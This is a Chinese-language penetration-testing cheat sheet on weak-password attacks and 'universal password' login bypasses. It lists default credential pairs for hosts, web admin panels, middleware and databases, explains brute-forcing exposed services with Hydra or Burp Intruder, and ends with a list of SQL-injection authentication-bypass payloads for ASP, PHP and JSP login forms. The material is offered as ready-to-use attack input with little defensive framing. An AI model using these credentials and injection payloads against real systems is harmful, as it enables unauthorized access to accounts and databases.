一、弱口令:
1、弱口令介绍
一般弱口令为系统默认密码或设置的简单密码,这些密码非常容易被攻击者猜到。在实际的渗透测试中,弱口令是一个攻击难度低,攻击成功率偏高的漏洞。
2、弱口令一般出现在什么地方呢?
对于Web层面就是后台管理员登录、普通用户登录等;
对于中间件层面就是MySQL弱口令、msSQL弱口令、Oracle弱口令、DB2弱口令、WebLogic弱口令、Tomcat弱口令及phpMyAdmin弱口令等;
对于系统层面就是ftp弱口令、3389弱口令、ssh弱口令、telnet弱口令及网关与路由登录弱口令等。
3、弱口令一般攻击什么地方呢?
弱口令一般直接对后台管理员登录界面及远程3389 /21/22/23/1433/3306/1521等服务端口进行攻击。
因此,我们还得先研究下怎么找到这些后台及服务端口的入口。
4、后台和服务器的入口
对于后台,推荐使用GoogleHack、GitHubHack、robots.txt及SVN或者GIT代码泄露等;对于远程服务端口就得分类了,ftp有ftp暴破工具,ssh有ssh暴破工具,
3389有3389暴破工具,我们可以根据具体的情况使用不同的工具加载适当的弱口令对远程端口进行暴力破解。
5、任何一种类型的漏洞,都没有弱口令来得简单、奏效。它的危害也是十分大的
6、某站遭到弱口令攻击,弱口令攻击有三类方法:手动使用经验攻击;使用弱密码破解;使用彩虹表破解。
6.1、对于第一类,手动输入
遇到主机输入administrator/123456、administrator /abcd-1234、Guest/Guest、root/root等;
遇到Web后台输入admin/admin、admin/admin888、PHPCMS/PHPCMS等;遇到中间件输入admin/admin、manager/admin、root/admin、WebLogic/WebLogic、Tomcat/Tomcat等;
遇到数据库输入root/root、root/root123、root/123456、sa/sa、sa/as、system/manager、scott/tiger等。
其实,就是利用人性的一些弱点来攻击Web站点(人们安全意识不强,没有修改默认密码)。
6.2、对于第二类,可以使用burpsuite-intruder或者Hydra等工具直接加载wordlist弱口令破解(前提是无验证码,或者绕过验证码,或者没有登录次数限制)。可以
在网上下载wordlist弱口令,针对不同的系统下载不同的wordlist,这样破解起来成功的概率会更大一些。
6.3、对于第三类,是在实在没有办法而且系统很重要的情况下才可以采用的。
7、弱口令的危害
有了弱口令危害就意味着不论您在其他方面做了多少努力,攻击者依然可以很轻松的突破您的边界,使得那些强大的安全设备通通沦为摆设。
抱歉,弱口令是真的可以为所欲为
8、弱口令的几种类型,以及各种组合
简单数字组合:123123 123456 12345678 654321 666666 888888
顺序字符组合:abcdef abcabc abc123 a1b2c3 aaa111
临近字符组合:123qwe Qwerty qweasd
特殊含义组合:admin password p@ssword passwd Iloveyou 5201314
关键词+链接符+弱口令:xxx@123
首字母大写+关键词+链接符+弱口令:Xxx@123
关键词加+数字:XXXX123
关键词+拱键盘:XXXX1qaz
关键词+链接符+拱键盘:XXXXX@1qaz
二、万能密码:
这里我只总结一些常用的万能密码
asp aspx万能密码
1:"or "a"="a
2: \')or(\'a\'=\'a
3:or 1=1--
4:\'or 1=1--
5:a\'or\' 1=1--
6:"or 1=1--
7:\'or\'a\'=\'a
8:"or"="a\'=\'a
9:\'or\'\'=\'
10:\'or\'=\'or\'
11:1 or \'1\'=\'1\'=1
12:1 or \'1\'=\'1\' or 1=1
13: \'OR 1=1%00
14: "or 1=1%00
15:\'xor
16: 用户名 \' UNION Select 1,1,1 FROM admin Where \'\'=\' (替换表名admin)
密码 1
17..admin\' or \'a\'=\'a 密码随便
PHP万能密码
\'or 1=1/*
User: something
Pass: \' or \'1\'=\'1
jsp 万能密码
1\'or\'1\'=\'1
admin\' or 1=1/*